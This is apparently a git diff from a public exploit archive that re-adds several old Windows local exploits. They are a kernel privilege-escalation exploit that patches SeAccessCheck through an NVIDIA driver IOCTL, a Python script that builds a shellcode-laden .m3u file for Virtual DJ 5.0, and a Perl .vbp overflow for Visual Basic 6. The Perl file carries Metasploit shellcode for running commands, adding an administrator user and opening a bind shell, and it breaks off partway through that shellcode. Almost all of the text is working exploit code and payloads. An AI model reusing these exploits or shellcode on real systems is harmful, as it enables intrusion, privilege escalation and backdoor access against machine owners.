+  (*pbPaeKernel) = FALSE;
+  pKernelBase = (LPBYTE) psGetImageBaseByBaseName(pps, "NTOSKRNL.EXE");
+  if(pKernelBase)
+  {
+    printf("(+)NTOSKRNL base found at %#x.\n",pKernelBase);
+  }
+  else
+  {
+    pKernelBase = (LPBYTE) psGetImageBaseByBaseName(pps, "NTKRNLPA.EXE");
+    if(pKernelBase)
+    {
+      printf("(+)NTOSKRNL(PAE) base found at %#x.\n",pKernelBase);
+      if(pbPaeKernel)
+      {
+        (*pbPaeKernel) = TRUE;
+      }
+    }
+    else
+    {
+      printf("(-)Unable to find NTOSKRNL base. Sorry.\n");
+    }
+  }
+  return pKernelBase;
+}
+
+
+/* 
+   when the ioctl with a fake event structure is sent
+   a dword with the opcode "jmp[ecx]" is written and
+   this code is reached.
+   Be careful writing your own shellcode. Remember that
+   u are at DPC level
+*/
+__declspec(naked)
+void 
+xpltPatchAndGo (void)
+{
+  __asm
+  {
+    add esp,4
+    pop esi                                   /* get a return addr to use as reference */ 
+    mov dword ptr[esi-0x60], 0x8B047289       /* patch the jmp[ecx] with the correct code */
+    mov word ptr[esi+0xE5303], 0x9090         /* patch SeAccessCheck :o) */
+    mov esp, ebp                              /* reconstruct the stack */
+    add esp, 0x10       
+    xor bl, bl                                /* set IRQL value */
+    xor edi, edi                              /* set return value */                       
+    sub esi, 0x759F                            
+    push esi                                  /* set retun address... */
+    ret                                       /* and go */
+  }
+
+}
+
+VOID
+xpltExecuteExploit(HANDLE hDevice, PBYTE pNtosBase, BOOL bPaeKernel)
+{
+
+#ifdef _DEBUG
+  DebugBreak();
+#endif
+
+  if(!bPaeKernel)
+  {
+    printf("(-)This exploit is only runs on a PAE kernel system. Sorry.\n");
+  }
+  else
+  {
+    DWORD dwReturnedBytes;
+    DWORD Buffer[1024];                             /* user buffer size is not checked         */
+                                                    /* properly so i use a big enough  buffer  */
+                                                    /* and i  dont worry abaut it              */
+
+    DWORD Event[31];                                /* our event struct                        */
+
+    printf("(*)Trying to exploit the NvCoaft51 KeSetEvent vuln...\n");
+    printf("(*)Writing fake event struct...\n");
+
+    *(BYTE*)Event = 1;                              /* set event type as Synchronization Event */
+
+    Event[2] = (DWORD)&(Event[3]);                  /* set event wait list as not empty so in  */
+                                                    /* event[3] start the first  wait block    */
+
+    Event[3] = (DWORD)&(Event[4]);                  /* set first element of the wait list      */
+                                                    /* event[4]  will be our wait block        */
+
+    ((WORD*)Event)[17] = 1;                         /* set the wait block type to WaitAny      */
+
+    Event[5] = (DWORD)&(Event[7]);                  /* set the trhead for the wait block, so   */
+                                                    /* event[7] will be our thread start       */
+
+    Event[7] = (DWORD)xpltPatchAndGo;               /* i put the shellcode addr on the first   */
+                                                    /* dword of the thread. This value is not  */
+                                                    /* checked by KeSetEvent related code, and */
+                                                    /* the event struct will remain referenced */
+                                                    /* by ecx,so writing a jmp[ecx] the        */
+                                                    /* shellocde will be reached               */
+
+
+    Event[30] = (DWORD)&(Event[10]);                /* fill thread wait block list with data   */
+                                                    /* so in event[10] start this wait block.  */
+                                                    /* First two dwords of the kwait block     */
+                                                    /* struct are a list entry. system will    */
+                                                    /* try to remove a item from this double   */
+                                                    /* linked list, and as consecuence, we     */
+                                                    /* can write an arbitrary dword at any     */
+                                                    /* address                                 */
+
+
+    Event[10] = 0x000021FF;                         /* first entry will be a opcode, jmp[ecx]  */
+
+    Event[11] = (DWORD)(pNtosBase + 0x291B4);       /* second entry will be the address of th  */
+                                                    /* next opcode addr, and as result we will */
+                                                    /* jmp to our shellcode                    */
+
+
+    Buffer[0] = (DWORD)(((PBYTE)(&Event)) - 0x84C); /* store our "event" in the ioctl buffer   */
+                                                    /* and explit it :o)                       */
+
+    printf("(*)Sending IOCTL...\n");
+    DeviceIoControl(hDevice,XPLT_KEVENT_IOCTL,Buffer,sizeof(Buffer),Buffer,sizeof(Buffer),&dwReturnedBytes,NULL);
+    printf("(+)IOCT sent. SeAccessCheck is now patched???\n");
+  }
+}
+
+
+VOID
+xpltExecute()
+{
+  if(xpltCheckWindowsVersion())
+  {
+    PPS pps;
+
+    pps = xpltInitializePsApi();
+    if(NULL != pps)
+    {
+      LPBYTE pKernelBase;
+      BOOL bPaeKernel;
+
+      pKernelBase = xpltGetKernelBase(pps,&bPaeKernel);
+      if(NULL != pKernelBase)
+      {
+        HANDLE hDevice;
+
+        hDevice = xpltOpenNvc0a();
+        if(INVALID_HANDLE_VALUE != hDevice)
+        {
+          xpltExecuteExploit(hDevice, pKernelBase, bPaeKernel);
+          xpltCloseNvc0a(hDevice);
+        }
+      }
+      xpltFreePsApi(pps);
+    }
+  }
+}
+
+int main(int argc, char * argv[])
+{
+  UNREFERENCED_PARAMETER(argc);
+  UNREFERENCED_PARAMETER(argv);
+
+#ifdef _DEBUG
+  DebugBreak();
+#endif
+
+  xpltExecute();
+  return 0;
+}
+
+// milw0rm.com [2007-08-30]
diff --git a/platforms/windows/local/4354.py b/platforms/windows/local/4354.py
index 29667a375..a3a81d935 100755
--- a/platforms/windows/local/4354.py
+++ b/platforms/windows/local/4354.py
@@ -1,32 +1,32 @@
-#Virtual DJ 5.0 Local Buffer OverFlow
-#224 bytes available for shellcode,, you can replace it with you favourite one,, 
-#ret addr -> 0x7199403D      jmp esp in mswsock.dll Winxp sp0
-#exploit : [A x 484] +[EIP - jmp esp - 4] + [Nops -10] + [Shellcode -224] 
-#Discovred by 0x58 && Coded By miyy3t,,Midt's lab !!
-#Greetz : M.i.d.t,, Diablos5s5s,, Simo64 ,, s4mi,, issam ,, Metasploit,,Str0ke & All Mor0Ccan & Muslims h4xorz
-# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
-
-shellcode = "\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x84"
-shellcode+= "\xd1\xfe\xd8\x83\xeb\xfc\xe2\xf4\x78\x39\xba\xd8\x84\xd1\x75\x9d"
-shellcode+= "\xb8\x5a\x82\xdd\xfc\xd0\x11\x53\xcb\xc9\x75\x87\xa4\xd0\x15\x91"
-shellcode+= "\x0f\xe5\x75\xd9\x6a\xe0\x3e\x41\x28\x55\x3e\xac\x83\x10\x34\xd5"
-shellcode+= "\x85\x13\x15\x2c\xbf\x85\xda\xdc\xf1\x34\x75\x87\xa0\xd0\x15\xbe"
-shellcode+= "\x0f\xdd\xb5\x53\xdb\xcd\xff\x33\x0f\xcd\x75\xd9\x6f\x58\xa2\xfc"
-shellcode+= "\x80\x12\xcf\x18\xe0\x5a\xbe\xe8\x01\x11\x86\xd4\x0f\x91\xf2\x53"
-shellcode+= "\xf4\xcd\x53\x53\xec\xd9\x15\xd1\x0f\x51\x4e\xd8\x84\xd1\x75\xb0"
-shellcode+= "\xb8\x8e\xcf\x2e\xe4\x87\x77\x20\x07\x11\x85\x88\xec\x21\x74\xdc"
-shellcode+= "\xdb\xb9\x66\x26\x0e\xdf\xa9\x27\x63\xb2\x9f\xb4\xe7\xff\x9b\xa0"
-shellcode+= "\xe1\xd1\xfe\xd8"
-
-bof = "A"*484+"\x3D\x40\x99\x71"+"\x90"*10+shellcode
-
-file = open('c:\/xploit.m3u','w+')
-file.write("#EXTM3U\n");
-file.write("#EXTINF:0,TITLE\n")
-file.write("C:/")
-file.write(bof)
-file.close()
-
-print "Exploit generated in c:\/xploit.m3u ...now open it with virtual dj !! "
-
-# milw0rm.com [2007-09-02]
+#Virtual DJ 5.0 Local Buffer OverFlow
+#224 bytes available for shellcode,, you can replace it with you favourite one,, 
+#ret addr -> 0x7199403D      jmp esp in mswsock.dll Winxp sp0
+#exploit : [A x 484] +[EIP - jmp esp - 4] + [Nops -10] + [Shellcode -224] 
+#Discovred by 0x58 && Coded By miyy3t,,Midt's lab !!
+#Greetz : M.i.d.t,, Diablos5s5s,, Simo64 ,, s4mi,, issam ,, Metasploit,,Str0ke & All Mor0Ccan & Muslims h4xorz
+# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
+
+shellcode = "\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x84"
+shellcode+= "\xd1\xfe\xd8\x83\xeb\xfc\xe2\xf4\x78\x39\xba\xd8\x84\xd1\x75\x9d"
+shellcode+= "\xb8\x5a\x82\xdd\xfc\xd0\x11\x53\xcb\xc9\x75\x87\xa4\xd0\x15\x91"
+shellcode+= "\x0f\xe5\x75\xd9\x6a\xe0\x3e\x41\x28\x55\x3e\xac\x83\x10\x34\xd5"
+shellcode+= "\x85\x13\x15\x2c\xbf\x85\xda\xdc\xf1\x34\x75\x87\xa0\xd0\x15\xbe"
+shellcode+= "\x0f\xdd\xb5\x53\xdb\xcd\xff\x33\x0f\xcd\x75\xd9\x6f\x58\xa2\xfc"
+shellcode+= "\x80\x12\xcf\x18\xe0\x5a\xbe\xe8\x01\x11\x86\xd4\x0f\x91\xf2\x53"
+shellcode+= "\xf4\xcd\x53\x53\xec\xd9\x15\xd1\x0f\x51\x4e\xd8\x84\xd1\x75\xb0"
+shellcode+= "\xb8\x8e\xcf\x2e\xe4\x87\x77\x20\x07\x11\x85\x88\xec\x21\x74\xdc"
+shellcode+= "\xdb\xb9\x66\x26\x0e\xdf\xa9\x27\x63\xb2\x9f\xb4\xe7\xff\x9b\xa0"
+shellcode+= "\xe1\xd1\xfe\xd8"
+
+bof = "A"*484+"\x3D\x40\x99\x71"+"\x90"*10+shellcode
+
+file = open('c:\/xploit.m3u','w+')
+file.write("#EXTM3U\n");
+file.write("#EXTINF:0,TITLE\n")
+file.write("C:/")
+file.write(bof)
+file.close()
+
+print "Exploit generated in c:\/xploit.m3u ...now open it with virtual dj !! "
+
+# milw0rm.com [2007-09-02]
diff --git a/platforms/windows/local/4355.php b/platforms/windows/local/4355.php
index 8382c67c0..e2c125653 100755
--- a/platforms/windows/local/4355.php
+++ b/platforms/windows/local/4355.php
@@ -7,7 +7,7 @@ exploit : [A x 277] +[EIP - jmp esp - 4] + [Nops -10] + [Shellcode -224]
 && if you want to exploit this vul with SEH ,, take some infos :p
 [ A x 277 ] + [EIP] + [B x 608] + [Pointer to next SEH record] + [SE handler]
 by : 0x58
-Greetz : Midt,,miyy3t,,Diablos5s5s5,,Str0ke,, MoroCcan haxorz,,!
+Greetz : Midt,,miyy3t,,Diablos5s5s5,,Str0ke,, MoroCcan haxorz,,!
 */
 # win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
 $shellcode = 
@@ -32,5 +32,5 @@ fputs($file,$bof);
 fclose($file);
 echo "Exploit generated in : ".$filename."
    ";
 ?>
-
-# milw0rm.com [2007-09-02]
+
+# milw0rm.com [2007-09-02]
diff --git a/platforms/windows/local/4361.pl b/platforms/windows/local/4361.pl
index 9d5e98136..2f3272f6d 100755
--- a/platforms/windows/local/4361.pl
+++ b/platforms/windows/local/4361.pl
@@ -1,369 +1,369 @@
-#!/usr/bin/perl
-#' ++ Microsoft Visual Basic 6.0 Code Execution 0-Day ++
-#' ++++++++++++++++++++++++++++++++++++++++++++++++++++++
-#'++ Author: Koshi                                      +
-#'++ Email: heykoshi at gmail dot com                   +
-#'++ Application: Microsoft Visual Basic 6.0            +
-#'++                                                    +
-#'++ Tested on Microsoft Windows XP Home Edition SP2    +
-#'++ Patched & Updated                                  +
-#'++                                                    +
-#'++ The vulnerable buffer exsists in the .VBP files of +
-#'++ Visual Basic projects. You can jump directly to    +
-#'++ the shellcode, or jump to it via EBP.              +
-#'++                                                    +
-#'++ There is NO restriction of shellcode size either.  +
-#'++                                                    +
-#'++ Gr33tz: Rima my baby who I love and adore, Draven  +
-#'++ for pointing me in the right direction, as always. +
-#'++                                                    +
-#'++                                                    +
-#'++ This exploit is for educational use only, blah.    +
-#'++                                                    +
-#'++                                                    +
-#'+++++++++++++++++++++++++++++++++++++++++++++++++++++++
-#'+++++++++++++++++++++++++++++++++++++++++++++++++++++
-#
-# Ex. of Usage:
-# perl vb6.pl 1 >>Project.vbp
-# 
-#
-$begin0 = "\x54\x79\x70\x65\x3D\x45\x78\x65\x0D\x0A\x46\x6F\x72\x6D".
-	  "\x3D\x46\x6F\x72\x6D\x31\x2E\x66\x72\x6D\x0D\x0A";
-
-$begin1 = "\x52\x65\x66\x65\x72\x65\x6E\x63\x65\x3D".
-	  "\x2A\x5C\x47\x7B\x30\x30\x30\x32\x30\x34\x33\x30\x2D\x30".
-          "\x30\x30\x30\x2D\x30\x30\x30\x30\x2D\x43\x30\x30\x30\x2D".
-          "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x34\x36\x7D\x23".
-          "\x32\x2E\x30\x23\x30\x23\x2E\x2E\x5C\x2E\x2E\x5C\x2E\x2E".
-          "\x5C\x2E\x2E\x5C\x2E\x2E\x5C\x57\x49\x4E\x44\x4F\x57\x53".
-          "\x5C\x73\x79\x73\x74\x65\x6D\x33\x32\x5C\x73\x74\x64\x6F".
-          "\x6C\x65\x32\x2E\x74\x6C\x62\x23\x4F\x4C\x45\x20\x41\x75".
-          "\x74\x6F\x6D\x61\x74\x69\x6F\x6E";
-
-$begin2 = "\x0D\x0A\x53\x74\x61\x72\x74\x75\x70\x3D\x22\x46\x6F\x72\x6D\x31\x22\x0D\x0A".
-          "\x43\x6F\x6D\x6D\x61\x6E\x64\x33\x32\x3D\x22\x22";
-
-$BuffOf = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-	  "\x41\x41\x41\x41";
-
-$codeAddr = "\x83\x25\x40\x01";
-# You can most likely use a call or a push, you could probably use them from kernel32.dll too.
-#* ntdll.dll    - 0x7C923DA3      jmp Ebp **** Is the one i have used in this example.
-# 0x77f6d42f  	jmp ebp   	ntdll.dll  (English / 5.2.3790.3) 	Windows 2003 Server 5.2.0.0 SP0 (IA32)
-# 0x77f7d9b6 	jmp ebp 	ntdll.dll  (English / 5.1.2600.11061) 	Windows XP 5.1.1.0 SP1 (IA32)
-# 0x77f8c449 	jmp ebp 	ntdll.dll  (English / 5.0.2163.1) 	Windows 2000 5.0.0.0 SP0 (IA32)
-# 0x77faa6ce 	jmp ebp 	ntdll.dll  (English / 5.2.3790.3) 	Windows 2003 Server 5.2.0.0 SP0 (IA32)
-# 0x7c85eb73 	jmp ebp 	ntdll.dll  (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32)
-# 0x7c8839ed 	jmp ebp 	ntdll.dll  (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32)
-#*0x7c923da3 	jmp ebp 	ntdll.dll  (English / 5.1.2600.21802) 	Windows XP 5.1.2.0 SP2 (IA32)
-# 0x77f8c449 	jmp ebp   	ntdll.dll  (French / 5.0.2163.1) 	Windows 2000 5.0.0.0 SP0 (IA32)
-# 0x77f6d9b6  	jmp ebp   	ntdll.dll  (German / 5.1.2600.11061) 	Windows XP 5.1.1.0 SP1 (IA32)
-# 0x7c933da3 	jmp ebp  	ntdll.dll  (German / 5.1.2600.21802) 	Windows XP 5.1.2.0 SP2 (IA32)
-# 0x77f5d42f  	jmp ebp   	ntdll.dll  (Italian / 5.2.3790.3) 	No associated versions
-# 0x77f6d9b6 	jmp ebp 	ntdll.dll  (Italian / 5.1.2600.11061) 	Windows XP 5.1.1.0 SP1 (IA32)
-# 0x77f8c449 	jmp ebp 	ntdll.dll  (Italian / 5.0.2163.1) 	Windows 2000 5.0.0.0 SP0 (IA32)
-# 0x77f9a6ce 	jmp ebp 	ntdll.dll  (Italian / 5.2.3790.3) 	No associated versions
-# 0x7c96eb73 	jmp ebp 	ntdll.dll  (Italian / 5.2.3790.1830031)	No associated versions
-# 0x7c9939ed 	jmp ebp 	ntdll.dll  (Italian / 5.2.3790.1830031)	No associated versions
-# ...backwards..if you don't know why, then gtfo.
-$jmpEbp = "\xA3\x3D\x92\x7C";
-$fourSkin = "\x44\x44\x44\x44";
-
-
-$begin3 = "\x0D\x0A\x4E\x61\x6D\x65\x3D\x22\x50\x72\x6F\x6A\x65\x63".
-	  "\x74\x31\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-          "\x41\x41\x41\x41\x41\x41\x41\x41";
-
-$koshi = "\x0D\x0A\x48\x65\x6C\x70\x43\x6F\x6E\x74\x65\x78\x74\x49\x44\x3D\x22\x30\x22\x0D\x0A\x43\x6F\x6D".
-	 "\x70\x61\x74\x69\x62\x6C\x65\x4D\x6F\x64\x65\x3D\x22\x30\x22\x0D\x0A\x4D\x61\x6A\x6F\x72\x56\x65".
-	 "\x72\x3D\x31\x0D\x0A\x4D\x69\x6E\x6F\x72\x56\x65\x72\x3D\x30\x0D\x0A\x52\x65\x76\x69\x73\x69\x6F".
-	 "\x6E\x56\x65\x72\x3D\x30\x0D\x0A\x41\x75\x74\x6F\x49\x6E\x63\x72\x65\x6D\x65\x6E\x74\x56\x65\x72".
-	 "\x3D\x30\x0D\x0A\x53\x65\x72\x76\x65\x72\x53\x75\x70\x70\x6F\x72\x74\x46\x69\x6C\x65\x73\x3D\x30".
-	 "\x0D\x0A\x43\x6F\x6D\x70\x69\x6C\x61\x74\x69\x6F\x6E\x54\x79\x70\x65\x3D\x30\x0D\x0A\x4F\x70\x74".
-	 "\x69\x6D\x69\x7A\x61\x74\x69\x6F\x6E\x54\x79\x70\x65\x3D\x30\x0D\x0A\x46\x61\x76\x6F\x72\x50\x65".
-	 "\x6E\x74\x69\x75\x6D\x50\x72\x6F\x28\x74\x6D\x29\x3D\x30\x0D\x0A\x43\x6F\x64\x65\x56\x69\x65\x77".
-	 "\x44\x65\x62\x75\x67\x49\x6E\x66\x6F\x3D\x30\x0D\x0A\x4E\x6F\x41\x6C\x69\x61\x73\x69\x6E\x67\x3D".
-	 "\x30\x0D\x0A\x42\x6F\x75\x6E\x64\x73\x43\x68\x65\x63\x6B\x3D\x30\x0D\x0A\x4F\x76\x65\x72\x66\x6C".
-	 "\x6F\x77\x43\x68\x65\x63\x6B\x3D\x30\x0D\x0A\x46\x6C\x50\x6F\x69\x6E\x74\x43\x68\x65\x63\x6B\x3D".
-	 "\x30\x0D\x0A\x46\x44\x49\x56\x43\x68\x65\x63\x6B\x3D\x30\x0D\x0A\x55\x6E\x72\x6F\x75\x6E\x64\x65".
-	 "\x64\x46\x50\x3D\x30\x0D\x0A\x53\x74\x61\x72\x74\x4D\x6F\x64\x65\x3D\x30\x0D\x0A\x55\x6E\x61\x74".
-	 "\x74\x65\x6E\x64\x65\x64\x3D\x30\x0D\x0A\x52\x65\x74\x61\x69\x6E\x65\x64\x3D\x30\x0D\x0A\x54\x68".
-	 "\x72\x65\x61\x64\x50\x65\x72\x4F\x62\x6A\x65\x63\x74\x3D\x30\x0D\x0A\x4D\x61\x78\x4E\x75\x6D\x62".
-	 "\x65\x72\x4F\x66\x54\x68\x72\x65\x61\x64\x73\x3D\x31\x0D\x0A\x0D\x0A\x5B\x4D\x53\x20\x54\x72\x61".
-	 "\x6E\x73\x61\x63\x74\x69\x6F\x6E\x20\x53\x65\x72\x76\x65\x72\x5D\x0D\x0A\x41\x75\x74\x6F\x52\x65".
-	 "\x66\x72\x65\x73\x68\x3D\x31\x0D\x0A";
-
-# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
-$shellc1 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-  	   "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". 
-	   "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-	   "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-	   "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-	   "\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47".
-	   "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38".
-	   "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48".
-	   "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c".
-	   "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
-	   "\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58".
-	   "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44".
-	   "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38".
-	   "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
-	   "\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47".
-  	   "\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a".
-	   "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b".
-	   "\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33".
-	   "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37".
-	   "\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59".
-	   "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56".
-	   "\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a";
-
-# win32_adduser -  PASS=koshi EXITFUNC=seh USER=4dmin Size=495 Encoder=PexAlphaNum http://metasploit.com
-$shellc2 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-	   "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-	   "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-	   "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-	   "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
-	   "\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x44\x4e\x53\x4b\x38\x4e\x37".
-	   "\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x38\x4f\x54\x4a\x51\x4b\x58".
-	   "\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x48".
-	   "\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".
-	   "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-	   "\x46\x4f\x4b\x53\x46\x55\x46\x52\x46\x30\x45\x47\x45\x4e\x4b\x48".
-	   "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x50\x4b\x54".
-	   "\x4b\x48\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x58".
- 	   "\x41\x30\x4b\x4e\x49\x38\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
-	   "\x42\x4c\x46\x46\x4b\x58\x42\x34\x42\x53\x45\x48\x42\x4c\x4a\x37".
-	   "\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a".
-	   "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b".
-	   "\x42\x30\x42\x30\x42\x50\x4b\x58\x4a\x36\x4e\x53\x4f\x45\x41\x53".
-	   "\x48\x4f\x42\x36\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
-	   "\x42\x55\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x46\x4a\x59".
-	   "\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x36\x4d\x46".
-	   "\x46\x56\x50\x42\x45\x36\x4a\x37\x45\x56\x42\x32\x4f\x52\x43\x46".
-	   "\x42\x42\x50\x56\x45\x46\x46\x47\x42\x52\x45\x47\x43\x37\x45\x36".
-	   "\x44\x57\x42\x42\x46\x53\x46\x36\x4d\x56\x49\x46\x50\x56\x42\x32".
-	   "\x4b\x36\x4f\x36\x43\x37\x4a\x46\x49\x36\x42\x32\x4f\x42\x41\x34".
-	   "\x46\x54\x46\x34\x42\x32\x48\x52\x48\x52\x42\x52\x50\x36\x45\x46".
-	   "\x46\x57\x42\x42\x4e\x56\x4f\x36\x43\x36\x41\x36\x4e\x46\x47\x56".
-	   "\x44\x37\x4f\x36\x45\x57\x42\x57\x42\x52\x41\x44\x46\x56\x4d\x56".
-	   "\x49\x46\x50\x56\x49\x46\x43\x47\x46\x57\x44\x37\x41\x36\x46\x57".
-	   "\x4f\x46\x44\x37\x43\x37\x42\x32\x46\x43\x46\x36\x4d\x56\x49\x36".
-	   "\x50\x56\x42\x42\x4f\x32\x41\x44\x46\x54\x46\x54\x42\x50\x5a";
-
-# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
-$shellc3 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-	   "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-	   "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-	   "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-	   "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
-	   "\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38".
-	   "\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x53\x4b\x48\x4e\x37".
